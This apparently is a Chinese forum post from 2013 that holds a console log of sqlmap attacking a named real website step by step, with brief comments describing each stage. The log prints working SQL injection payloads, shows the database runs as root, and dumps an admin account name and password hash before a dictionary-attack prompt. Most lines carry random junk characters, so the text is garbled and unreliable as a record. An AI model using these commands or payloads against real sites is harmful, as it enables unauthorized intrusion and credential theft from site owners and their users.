D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: d$ D' O' {: {5 Ums "Mysql" --current-user /* 注解:获取当前用户名称
; I, K3 Z/ A0 q sqlmap/0.9 - automatic SQL injection and database takeover tool
$ h. x$ J% W- q3 g% d7 X9 N http://sqlmap.sourceforge.net starting at: 16:53:54
+ q& ?% M2 o7 \[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as/ x& C+ T0 R X7 h4 Z0 B. l) i
session file
9 P$ N$ K% V5 ]+ N! {$ @[16:53:54] [INFO] resuming injection data from session file
1 C- ?9 E2 z! B[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
2 H: C k2 a9 R7 ]: I" t& T[16:53:54] [INFO] testing connection to the target url
! A- ]+ R8 @5 w4 b0 N1 D" H! \; }sqlmap identified the following injection points with a total of 0 HTTP(s) reque+ R/ r3 d" K4 S+ \/ y
sts:
" Y, |1 { ]" K5 _* l: s- M0 z---) U3 ], ~$ P3 i% V& z* R0 s
Place: GET
' O* j9 k: x5 h1 w" iParameter: id. l% `- @- q5 K% R
Type: boolean-based blind' h( Y F0 a2 }2 Z8 @: ^
Title: AND boolean-based blind - WHERE or HAVING clause
: K! x$ x! A* Y- E Payload: id=276 AND 799=799
0 L- B, j" }% o6 G) B Type: error-based
4 R& Q9 s9 D9 _, R Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 G* N0 t. m3 u( K Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 z7 E) Y; O+ U @
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% [ y) p" h* b$ G# s
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)* u8 c$ U3 s8 ^% w @& y
Type: UNION query: P; [3 P( c F& ~
Title: MySQL UNION query (NULL) - 1 to 10 columns2 m5 f. N' a2 Q* \$ B
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! ]3 p& A0 V. u3 @$ ?(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),# D9 b/ u; C) q" |: C
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#6 F! S" i: H! `6 C9 r: B4 F. ~4 q
Type: AND/OR time-based blind
0 i* t M7 Z- ] Title: MySQL > 5.0.11 AND time-based blind- z, h9 K6 D! s5 ~
Payload: id=276 AND SLEEP(5)
. `5 ]( c2 B) k4 o: c* Y I4 b+ {---
/ m4 m1 C- E7 a, r. f* Y5 Y[16:53:55] [INFO] the back-end DBMS is MySQL( l, e% H1 ]7 @
web server operating system: Windows
3 \ g1 v J; @6 @7 Jweb application technology: Apache 2.2.11, PHP 5.3.0
) L* g! p4 X& M/ s' Iback-end DBMS: MySQL 5.0" l! j4 W% z" `$ g) k
[16:53:55] [INFO] fetching current user9 j8 s- m; B$ w
current user: 'root@localhost' " y# f- i( R; U1 f& O( K
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
. y# p& H8 q" H' ytput\www.wepost.com.hk' shutting down at: 16:53:58, O/ S: E( L0 r$ }
0 U3 J( K/ E0 }3 o" ^% T
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db( w& {/ T2 v: ?7 }3 z
ms "Mysql" --current-db /*当前数据库* s5 Q: v. S3 B! t
sqlmap/0.9 - automatic SQL injection and database takeover tool
' Q- o0 L7 @1 V: P* \ http://sqlmap.sourceforge.net starting at: 16:54:16
) T @! O( V7 ^/ l[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
9 [* r) B) h9 n0 ], [& ? session file
2 q, Z9 e8 Q/ u" T[16:54:16] [INFO] resuming injection data from session file
' _5 M! g M+ O1 r3 ]1 e[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
# P" k: ]0 E5 J5 Q[16:54:16] [INFO] testing connection to the target url
( H; }% ]( @) Q f# n! x Isqlmap identified the following injection points with a total of 0 HTTP(s) reque5 C. f0 T, q2 u; G. |* I+ ^4 o# D
sts:
& i: m+ f& W" O' e5 d( M q. P0 a( l---
: V9 f2 V7 o- VPlace: GET% D6 o1 G$ B# i
Parameter: id
. k) K: c2 X3 ?3 Y7 X( V; X; m Type: boolean-based blind
6 A! ?; p0 N$ Q* ` B4 I Title: AND boolean-based blind - WHERE or HAVING clause
/ j% [" i3 n: a Payload: id=276 AND 799=799
0 F% v& J \9 v9 y* b+ G; p Type: error-based$ k3 q A( f1 Z9 R- e
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
3 {0 H2 M9 c4 m A- e: q" w Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
% |9 Y i0 d2 `. [& V' p120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
( D" O7 t/ F r6 \+ S3 p/ y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)4 \+ @: I$ @9 d# W, Q8 {9 X
Type: UNION query
" Z2 r8 G9 T i3 H; ~0 G0 R6 m; O$ N Title: MySQL UNION query (NULL) - 1 to 10 columns
2 V: S/ V& B2 y k3 ? C Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% t" g7 F% r3 R! l- p3 P
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
: M( E3 D. {3 ]: {9 [CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
" K8 |( x& I% a( S c9 d4 k. Y/ b Type: AND/OR time-based blind$ V" @% R) `0 ]; G2 g' S9 @
Title: MySQL > 5.0.11 AND time-based blind: S; g+ j9 ?7 T1 _
Payload: id=276 AND SLEEP(5)
4 E8 t h$ d0 Z- D7 ]6 c5 @3 N---$ n9 C5 u9 d2 F9 |# E
[16:54:17] [INFO] the back-end DBMS is MySQL
4 c0 @; B1 z4 B9 T3 @web server operating system: Windows
) V9 D1 _8 ^: t0 ~: Qweb application technology: Apache 2.2.11, PHP 5.3.0
8 ]/ e2 \! w `. Wback-end DBMS: MySQL 5.0" Z; o4 k% a8 y3 }0 V
[16:54:17] [INFO] fetching current database
3 J( X. b) ]$ y x6 ~current database: 'wepost'# f: b/ [+ ]2 T
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou% J5 Y( ?3 X1 q5 s2 }+ q
tput\www.wepost.com.hk' shutting down at: 16:54:18* F( R% Z. [- k% j
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
7 b$ Z9 M$ _" [: ^% e" ]ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名& h& G7 i4 t9 d9 n* d! k, e6 h) M$ B
sqlmap/0.9 - automatic SQL injection and database takeover tool
6 s; l, G+ k. l( f" r) c http://sqlmap.sourceforge.net starting at: 16:55:250 A# f6 k0 U' T6 k9 g
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as0 g: A! C: ], E% Z6 W0 `
session file; U6 g6 X, v' e4 D+ d
[16:55:25] [INFO] resuming injection data from session file5 D; l* d p$ }" t$ `6 E
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
: U( w7 i2 f- W4 V; \$ J[16:55:25] [INFO] testing connection to the target url9 y }! p& y: P, y1 a
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
% H6 T h) m+ }, Nsts:
0 z+ F) F8 o* L! i9 B---
$ X1 T& ^- U! q; OPlace: GET, S% K7 \& v7 s) J1 B
Parameter: id
+ c. I) l$ w$ O. P- ^ Type: boolean-based blind$ h8 ?6 i9 J4 d! X7 u8 b% V
Title: AND boolean-based blind - WHERE or HAVING clause* C' x: R% I+ l/ v
Payload: id=276 AND 799=7996 d( M9 [% a& U
Type: error-based1 S- {' g/ Q) t- U
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& Y+ B" v1 l* C+ n/ F2 C: `9 }
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
+ x' H, W' b" g4 q# X% ?120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 i0 N3 U2 u: p( R; Y4 c
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). U3 i, N6 {! p1 w
Type: UNION query
, _) h$ Y) T3 A Title: MySQL UNION query (NULL) - 1 to 10 columns3 g+ v$ y9 s! H# W
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 y" @+ ]7 t7 l( g. S0 j( q) L) \- w
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
& `1 m# K8 R7 ~6 w( N/ }* ZCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
1 U6 ~) X1 S3 z% f" A Type: AND/OR time-based blind8 s' N! y7 @' M
Title: MySQL > 5.0.11 AND time-based blind
. r2 Q% X; v6 Q8 @- P Payload: id=276 AND SLEEP(5)! K% U9 d0 o/ `3 \. t1 s* {
---
8 _, ~" k0 X# J; U! X$ S[16:55:26] [INFO] the back-end DBMS is MySQL
9 E* [: T, \( J+ Kweb server operating system: Windows8 x: c0 d9 K( V. P& I3 B1 ^' j
web application technology: Apache 2.2.11, PHP 5.3.0
( |" c* a7 f# D1 cback-end DBMS: MySQL 5.07 c. m. i4 Q) j N# n
[16:55:26] [INFO] fetching tables for database 'wepost'
$ n/ q' i6 o$ C4 ?% I( A h[16:55:27] [INFO] the SQL query used returns 6 entries
s, V) W" y: H# {; p% z: XDatabase: wepost
. q' \7 G8 z* N[6 tables]
# l+ G1 ^2 x& y3 h6 B; @+-------------+
" X& r x3 C2 b t| admin |
- i: W8 M# a& B* w| article |
5 W+ f+ c4 T+ D7 \8 P, {7 N| contributor |8 m# ?7 X, x4 p/ O$ G2 P
| idea |
5 b! p. g8 T3 l0 o/ ?| image |, ~$ c* A' B+ y, H. T! [' ^: g; C
| issue |& E0 Q. T6 ?# n* n7 ?( W7 e0 [2 }
+-------------+
3 U8 U. H5 i0 F& i. Y9 C. S[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# n2 o/ @+ F% j4 b
tput\www.wepost.com.hk' shutting down at: 16:55:332 g. P' ^: O9 n& p/ v
0 V/ g y- f+ K+ K* Z p: lD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db D$ [ E: r5 d0 B' x) Y! Q
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名7 ^0 s+ X! ^! @' Z
sqlmap/0.9 - automatic SQL injection and database takeover tool2 x3 g* @ F i9 y: Y1 Q% _
http://sqlmap.sourceforge.net starting at: 16:56:06
( L5 o9 L( R, j8 S8 Q; H9 n6 a% dsqlmap identified the following injection points with a total of 0 HTTP(s) reque" @: ]0 w( {: b& s# U f
sts:
& u& R- j2 l+ c$ q- u" z---, j" Y& S4 Z, F. D$ ], S
Place: GET
! P& V$ F4 x8 l& \/ F# X; ZParameter: id3 r- m7 o' _+ Z3 d
Type: boolean-based blind
* C* G, S# k0 B7 k( d- @8 m$ _ Title: AND boolean-based blind - WHERE or HAVING clause
# N; G3 E: B+ O' u S8 P Payload: id=276 AND 799=799
) t3 L, T9 M8 B6 s$ t Type: error-based* L$ W# f: ?' I
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* u( i/ d# n3 m- o6 D
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) c* o w* U% A" ~
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ Q' t% L' L( u" R6 S) F
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)2 p* O _0 l3 e1 \* n
Type: UNION query
' @3 g2 G, \- U: d Title: MySQL UNION query (NULL) - 1 to 10 columns# K8 B; W4 H, Z& Z/ m% v4 [
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
% X/ G, }! u3 V9 P+ E. d) q/ z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! c* i/ W- Z. [1 g: D: V8 h4 n& C
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
( J% R- r1 D" ^ _ Type: AND/OR time-based blind
, i% }. n2 H$ v Title: MySQL > 5.0.11 AND time-based blind
7 T# P2 Z. a4 p7 q( A Payload: id=276 AND SLEEP(5)
+ [' w3 m, `3 Z5 O* x5 v---. f5 U% v, w- x% I" |
web server operating system: Windows
: L3 _6 Z. \1 R- @0 W. eweb application technology: Apache 2.2.11, PHP 5.3.0+ @6 V/ V6 D3 t% T& O4 `
back-end DBMS: MySQL 5.0
7 O; y3 i: n5 K% n9 d+ u[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se/ L- S0 S- C' l, A7 H1 u/ N7 ?. F6 ]
ssion': wepost, wepost9 r4 ]$ ~ C0 g- ?
Database: wepost$ d/ P0 K; Y( e0 q( F, A
Table: admin
4 R; ]. n5 A+ Q6 u[4 columns] \- h. G# t" z# y6 g
+----------+-------------+6 S4 O5 v3 \6 B
| Column | Type |' G; T# f6 q. _5 P
+----------+-------------+6 k9 E' k) @7 \: ?6 l
| id | int(11) |% k8 j; X9 {5 e9 |- Z; Y) o
| password | varchar(32) |) Y/ x# y/ n2 W @% u1 s
| type | varchar(10) |7 L$ s8 H& w3 u, N2 G
| userid | varchar(20) | [4 J. p) w7 M5 ^. Y) v
+----------+-------------+/ @. b2 V {4 L7 `$ l l8 M' u
shutting down at: 16:56:19
/ _5 `7 }/ @/ m5 ]
& A8 A, E8 c% @' m7 gD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
' g) H, q/ y1 I/ v* kms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容, n8 A- H' l4 n" }4 M
sqlmap/0.9 - automatic SQL injection and database takeover tool* g' B1 l, K# x' p C5 C- ^; @9 G
http://sqlmap.sourceforge.net starting at: 16:57:14
4 I( D. ]$ i2 _) J4 _* P8 {* l( o0 Usqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 g3 u% @7 G5 z7 V. r2 v6 Fsts:
' }% c0 B; {# A. D$ p5 S0 D---* ?# Y6 p7 t. E7 ^( c% e0 P
Place: GET8 S2 x, a+ Y: M# \- W' @7 C8 X
Parameter: id! g0 B% [2 A3 n9 O( I' n U! |, i
Type: boolean-based blind- K1 X& i u0 }/ Z8 h7 u. ^6 i
Title: AND boolean-based blind - WHERE or HAVING clause
+ W' N& _) @3 v& h/ U/ F( ^1 w Payload: id=276 AND 799=799
$ d: i! k4 l$ {9 E Type: error-based% u* c, ^5 d+ _3 O' D
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause6 g/ ^1 |6 r& S/ A* R1 X. B( a
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 P0 D D( H1 v h9 I- v# `
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* j0 f0 ^ Q+ N4 a" q( R5 O$ V
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 u3 w# Z) D) C4 B6 G! l1 \
Type: UNION query
1 f" w% l2 k. L. M Title: MySQL UNION query (NULL) - 1 to 10 columns# f- d4 `% h% F z$ ?
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
f8 ~5 n* S, s l(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
1 ~/ _, C; G I K* R! aCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#! ]6 g: J$ ?$ K/ w
Type: AND/OR time-based blind! w; C* V* _2 Y6 B
Title: MySQL > 5.0.11 AND time-based blind9 E6 n% u/ e( m
Payload: id=276 AND SLEEP(5)) X) [: V) r6 p" V: K
---7 Y' e/ F: P @. Z" E" L5 i6 b
web server operating system: Windows
8 k! F! l6 ]! H5 O! t1 R8 _web application technology: Apache 2.2.11, PHP 5.3.0
6 p2 d t; X. p4 K) {$ o3 ~back-end DBMS: MySQL 5.0. i* V4 {( B3 b5 E! S7 b
recognized possible password hash values. do you want to use dictionary attack o
1 H2 d- ~" L0 P" T. cn retrieved table items? [Y/n/q] y
9 M; ~; m4 F+ k& @$ Fwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]- j. A, C5 j8 n8 M
do you want to use common password suffixes? (slow!) [y/N] y1 A! N8 u) p. p" j; i
Database: wepost
. w* R P( d2 i# N! c! mTable: admin9 H) q2 J7 _0 j) ^$ Y
[1 entry]" N2 {; `& [8 _' l
+----------------------------------+------------+
! M# N* t# ]4 e| password | userid |
0 S3 m( B" u4 `) c+----------------------------------+------------+6 N/ K q) ^9 K; e6 R; D
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |4 e1 N/ z6 j, K* J9 p
+----------------------------------+------------+
- z, I& c. K# Z( }5 W6 } shutting down at: 16:58:14; T- e6 o7 ]9 N0 T+ m' U
% z4 W% n7 q8 h1 W# d
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对